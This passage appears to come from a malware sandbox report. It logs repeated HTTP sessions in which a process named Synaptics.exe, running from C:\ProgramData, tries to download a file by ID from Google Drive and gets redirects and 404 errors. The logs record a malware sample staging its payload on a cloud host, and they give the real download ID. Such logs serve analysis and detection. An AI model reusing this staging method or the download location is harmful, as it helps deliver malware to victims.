                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-m3NU176D49aC2iGLV3DbNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        22 | 192.168.2.4 | 49807 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:33 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:33 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-efYs8UfOffW9sGqlYwrXLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        23 | 192.168.2.4 | 49808 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:33 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:33 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7JcGOyMUxfsATLoOfu-7-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        24 | 192.168.2.4 | 49812 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:36 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GJ15AytQnd2zTl3QSD5fbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        25 | 192.168.2.4 | 49813 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:35 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
2024-12-24 21:11:37 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4pKyjdqt4DzAwuz2ckpNDPo_jMB6XfH4kT_PMUHhNVAQ9LIe-hbRn0uGNs2rwUVeefHDMRBaE
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:36 GMT
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tZihVc4qzydeDx-Gv_6Xbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
2024-12-24 21:11:37 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-24 21:11:37 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="u5vhlcq2PORzRLDJehpefQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-24 21:11:37 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49814 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 21:11:35 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
2024-12-24 21:11:36 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC7rnA9_S7Qi8GCA-UfTGrN2qot5VI59vv9DVVz-6ifeqn1KLxJhijsbMUdSyxLEDlh-s-OSi1Y
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:36 GMT
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8KwHAnbsuHNwIumLCnEOIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
2024-12-24 21:11:36 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-24 21:11:36 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="bvlLRLXCxLQGoU2B4Mbi9A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-24 21:11:36 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49815 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 21:11:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-24 21:11:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:36 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SMg5fs16xs10qJZ1RKUuxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49823 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 21:11:38 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-24 21:11:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:39 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-XjSviuluHwAmy4CU49_Lyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49822 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 21:11:38 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-24 21:11:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:39 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0ASf4NP1IAJDV002cd-eLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49828 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 21:11:41 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
2024-12-24 21:11:42 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC7WA2Y8YS4sq2SX7PKcmRLUFFUwmOfe-iVK2TqvHNzPYGCEVdCfiNZEhdaIlmmmOwqoMp9PPFU
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:41 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-H0xkIP8YlI84o1Uzra5R1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
2024-12-24 21:11:42 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-24 21:11:42 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="_PBz18ArdGkoI16LWz_8uw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-24 21:11:42 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49827 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 21:11:41 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:42 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-1BneYV-k4RE8pyG5YrG_EQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        32 | 192.168.2.4 | 49829 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:41 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:42 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-M1WvmV5tFHu0LBkenv_Bsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        33 | 192.168.2.4 | 49830 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
